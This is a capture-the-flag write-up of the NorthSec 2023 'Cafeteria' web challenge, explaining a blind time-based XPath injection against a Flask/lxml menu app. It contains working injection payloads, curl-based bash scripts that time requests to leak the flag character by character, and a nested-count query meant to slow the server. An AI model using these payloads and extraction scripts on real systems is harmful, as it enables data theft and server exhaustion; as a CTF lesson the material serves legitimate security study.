NSEC23 Cafeteria - Mon, May 29, 2023 - Jean Privat Sideni
An Impossible Challenge | Web | Nsec23
The cafeteria challenge gives us a webpage to query the cafeteria menu.
Let’s choose Monday!
There is also a stolen photo of some Flask code.
Read the Code
It’s a Flask application that uses etree
from lxml
to do some XPath queries on a menu.xml
file.
I know nothing about XPath (and globally avoid XML technologies) and Python is not my strong language.
But we can read and analyze the given code.
The /menu
route is interesting. There is an obvious XPath injection on string concatenation (line 24).
Then a similar query with something that looks like a prepared query, thus without visible injection.
There is two print statements with useful and controlled information between the two XPath queries.
After the two XPath queries, the page is rendered with the chosen food. There is also a debug mode we can activate through a simple crafted cookies that could show us the query, but only if both queries are successful.
The thing is, being successful seems hard if we tamper the query.
handle_exception
prevent the playful user of trying various things:
- if the request argument
day
is garbage, then the first query is malformed, it will raise anXPathEvalError
(line 27). - if the request argument
day
is correct enough to pass the first query, but the result is empty, thenelmts2[0]
will raise anIndexError
(line 28). - if
day
gives a nonempty result for the first query, then the second query is evaluated and should always success. But ifday
is not the name of an existing day in the XML file, the result should be empty, thenelmts[0]
will raise anIndexError
(line 31). - if the result is nonempty, then we get the menu of the day, and no flag.
Threat Model
It is likely that the flag is in the XML file — an RCE is always a possible alternative goal, or a completely different target could present itself, but the XML is likely the right target.
There is no strong guarantee, but it is a guts feeling. The visible XPath injection should be used to extract some juicy secret from the XML file.
But the day
argument seemed not that useful as is. If we tamper with it, it causes exceptions to be raised, and the display of An error occured
without any additional information.
Possible actions:
- Look for possible other entry points. Enumerate routes? Maybe we could get some access to the log file where the strings are printed?
- Look for possible existing CVE on those libraries, especially the
etree
thing. - Look for possible misconfiguration of the Flask application that could be exploited.
- Look for possible 0-day in the popular Python libraries that are used.
All these are not what I like to do, nor what I’m good at. So I did stop and put back the challenge in some make-believe backlog for later (or never) and hope my teammates will be more successful than me.
NorthSec Jeopardy
During the Jeopardy, in the middle of some intense random number generation, Sideni who was seated in front of me turned from his chair, looked at me and said:
I think I know for Cafeteria, it could be a time based attack… No, I’m sure… It will work… Just inject the first query with an expression long enough to compute, then exfiltrate the flag.
(OK, He might not have said it like that, especially because it was in French.)
Then, he turned back to watch some fucking up action.
Time to Attack
It’s Sunday afternoon, I’m tired and not that many challenges I could do remain. Cafeteria was still untouched, and will likely be the last I try to solve.
First, get some local code to experiment on my machine.
#!/usr/bin/env python3
import sys
from lxml import etree
parser = etree.XMLParser(resolve_entities=False)
tree = etree.parse('menu.xml', parser)
root = tree.getroot()
day = sys.argv[1]
query = "//day[@name='" + day + "']/meal/text()"
print(query)
elmts2 = root.xpath(query)
print(str(elmts2[0]))
query2 = "//day[@name=$theday]/meal/text()"
elmts = root.xpath(query2, theday=day)
food = str(elmts[0])
print(food)
It’s a simple python program copied from the photo. There is no Flask
.
The argument day
is given with the command line.
I also wrote a possible XML file. As stated before, I do not know XPath, so I need to have something concrete to experiment and resonate on.
<menu>
<day name="Monday">
<meal>Du manger</meal>
</day>
<flag>FLAG-X</flag>
</menu>
I added a random flag
element, so I can check if I can exfiltrate it on my machine.
I still don’t know where the real flag is, but at the moment I did not care. I just needed a local proof of concept that I could exfiltrate something with a time based attack.
Time Based
If I temper with day
, I will get an error. But since I control day
, I can control the duration of the XPath query, thus the duration of the HTTP request.
XPath conditions filter selected nodes, they are between brackets and can be visible in the given Python code.
E.g. [@name='Monday']
selects node that have an XML attribute name
with the value Monday
.
Besides the equality operator =
, XPath offers additional operators and functions.
I looked at a list of them to see if some could be useful.
For instance, the functions string-join
and tokenize
seemed nice.
We could use them to split a string abcd
into a sequence of 4 strings a b c d
, then join them with the original string, get aabcdbabcdcabcdd
, and do it again, and again, causing a lot of slow string operations.
Unfortunately, those two functions were not available in the XPath version implemented by etree
.
concat
and contains
exist and are available.
They are less inefficient, but I just need to have a slowdown perceptible in the noise of TCP, HTTP, or Flask; not to DOS the server.
Note: since XPath collects sets of nodes, then run some filters on each of them, that could require collecting other nodes and so on, there might be some XPath way to achieve something like forall nodes do forall nodes do forall nodes do ...
that can be exhausting on the server.
If the string concatenation approach did not work, this was my B plan.
Predicate
A slow query is good only if you can use it to exfiltrate information. A single bit of information can be materialized by a predicate. If the predicate is true, then you get slow (error) response. If the predicate is false, then you get a fast (error) response.
With day = Monday'][$predicate][$slowdown][''='
, the full query will be //day[@name='Monday'][$predicate][$slowdown][''='']/meal/text()
that is a valid XPath query. Thus:
- It will select the Monday node;
- then evaluates the predicate. If false, it stops and returns an empty list of nodes. If true it
- then evaluates the slow operation.
- the rest is in fact useless for the attack, but it need to form a valid XPath expression.
Program is b.sh
. Code is ugly and complex for nothing. It takes the predicate as an argument, then performs 3 curl invocations with 3 nested requests.
The nested requests are here to limit some TCP overhead.
I was not even sure they made some real difference.
Note: with better tooling and a better state of mind, I could have done better. But it was Sunday afternoon at NorthSec and you go with the poor tools and the poor state of mind you have.
#!/bin/bash
r="text()"
for i in `seq 7`; do
r="concat($r,$r,$r)"
done
r="Monday'][$1]/../../*[not(contains($r,'ZZ'))]/..//day[''='"
command time -f ' %e' curl \
http://cafeteria.ctf:5000/menu -G --data-urlencode "day=$r" -: \
http://cafeteria.ctf:5000/menu -G --data-urlencode "day=$r" -: \
http://cafeteria.ctf:5000/menu -G --data-urlencode "day=$r" &&
command time -f ' %e' curl \
http://cafeteria.ctf:5000/menu -G --data-urlencode "day=$r" -: \
http://cafeteria.ctf:5000/menu -G --data-urlencode "day=$r" -: \
http://cafeteria.ctf:5000/menu -G --data-urlencode "day=$r" &&
command time -f ' %e' curl \
http://cafeteria.ctf:5000/menu -G --data-urlencode "day=$r" -: \
http://cafeteria.ctf:5000/menu -G --data-urlencode "day=$r" -: \
http://cafeteria.ctf:5000/menu -G --data-urlencode "day=$r"
This was enough to get a noticeable difference between 1=0
(fast) and 1=1
(a little slower).
Time measurement were noisy, but if I was unsure, I could just measure again.
Getting the Flag
We can evaluate a predicate on the server and get its result: fast=false, slow=true. But we need a flag.
Can we test the presence of a character in a string?
for c in {a..z} {A..Z}; do echo "$c"; ./b.sh "(substring('f',1,1)='$c')"; done
Yes! It’s slow on f
, but fast with the other letters, as expected.
How many node texts start with a capital F
?
for c in {0..4}; do echo "$c"; ./b.sh "(count((../..//*)[substring(text(),1,1)='F'])=$c)"; done
One! Fast for 0, 2, 3 and 4. But slow for 1.
What character follows the string FLAG-
?
for c in {a..z} {A..Z} {0..9}; do echo "$c"; ./b.sh "(count((../..//*)[substring(text(),1,6)='FLAG-$c'])=1)"; done
Its 6
!
Can leak the other characters?
b
, 0
, 6
, 8
, a
, f
… This looks like lowercase hexadecimal, a classical flag, but a worthy flag.
We adapt the iterated characters to be {0..9} {a..f}
and the remaining characters faster.
#!/usr/bin/bash
p=$1
l=${#p}
for c in {0..9} {a..f}; do
echo "$c"
./b.sh "(count((../..//*)[substring(text(),1,$l+1)='$p$c'])=1)"
done
Each character of the flag was extracted semi-manually with the above script because I was too tired to program something automatic and robust enough to deal with the low and noisy difference between slow and fast.
Having 3 times displayed for each character (in b.sh
) made it easy to check and decide manually. I could just run again in case of any doubt.
Hopefully, the flag will be short (it was not).
FLAG-6b068afe3d4d4b1cb07aa6551576fec2
1/1 You are now an executive chef
6 points
Extra step for the Write-Up
For some reason, I cannot reproduce the attack when writing the present write-up. The string concatenation is now not slow enough to be noticeable (or the environment is now too noisy?). Or maybe I did simply hallucinate back there and the cafeteria challenge was not as I remember.
My memory is not that reliable, but the random shell scripts on my hard drive are consistent with the write-up. And I got the flag… I think.. Did I submit it?… hmmm…
Now my mind is a little in a better state (my tooling still sucks). Let’s try a more efficient approach (the B plan) with a more costly request that counts all nodes for all nodes for all nodes for all nodes for all nodes (5 levels is enough, add more if you wish).
#!/usr/bin/bash
r="count(ancestor-or-self::*/descendant-or-self::*)>0"
for i in `seq 5`; do
r="count(ancestor-or-self::*/descendant-or-self::*[$r])>0"
done
r="Monday'][$1][$r][''='"
echo "$r" > "r.txt"
Here:
ancestor-or-self::*
selects all parents of the current nodedescendant-or-self::*
selects all children of the current node- so
ancestor-or-self::*/descendant-or-self::*
basically selects all nodes. I have no idea of how large is the XML document, but all nodes seem a decent enough quantity. count(ancestor-or-self::*/descendant-or-self::*)>0
is true if there are any nodes :)*[count(ancestor-or-self::*/descendant-or-self::*)>0]
for each node (of all the nodes), select it if there are more than 0 nodes in the XML document (but select and count them to be really really really sure).
Do it five times in a nested way, and it’s a lot of useless computation!